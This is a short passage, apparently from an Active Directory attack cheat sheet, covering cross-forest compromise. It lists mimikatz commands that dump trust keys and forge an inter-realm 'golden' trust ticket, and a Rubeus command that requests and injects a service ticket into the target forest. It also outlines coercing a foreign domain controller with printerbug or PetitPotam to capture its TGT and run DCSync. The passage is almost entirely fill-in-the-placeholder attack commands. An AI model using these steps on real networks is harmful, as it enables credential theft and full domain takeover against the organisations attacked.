    2. Forest to Forest Compromise – Trust Ticket

      1. "lsadump::trust /patch"
         "lsadump::lsa /patch"

        1. "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:<golden_ticket_path>"

          1. .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"<service SPN in the target forest>" /ptt
    3. Breaking forest trust

      1. printerbug or petitpotam to force the DC of the external forest to connect to a local unconstrained delegation machine. Capture the TGT, inject it into memory and DCSync. Only works while TGT delegation is still enabled across the trust (EnableTGTDelegation, off by default since the 2019 updates)